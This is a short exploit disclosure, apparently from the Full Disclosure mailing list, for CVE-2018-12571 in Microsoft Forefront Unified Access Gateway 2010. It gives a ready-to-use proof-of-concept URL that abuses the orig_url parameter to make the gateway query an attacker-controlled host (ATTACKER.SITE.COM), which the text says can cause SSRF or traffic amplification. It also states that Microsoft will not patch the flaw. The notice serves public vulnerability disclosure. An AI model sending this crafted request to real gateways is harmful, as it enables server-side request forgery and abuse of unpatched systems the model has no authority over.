# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction # Vendor Homepage: https://www.microsoft.com/ # Version: 2010 # CVE : CVE-2018-12571 # Proof of Concept #1
Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to trigger outbound DNS queries for arbitrary hosts via a comma-separated list of URLs in the orig_url parameter, possibly causing a traffic amplification and/or SSRF outcome. /uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM <http://2FATTACKER.SITE.COM>%2Ftest* # Fixes It will not be patched by Microsoft. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
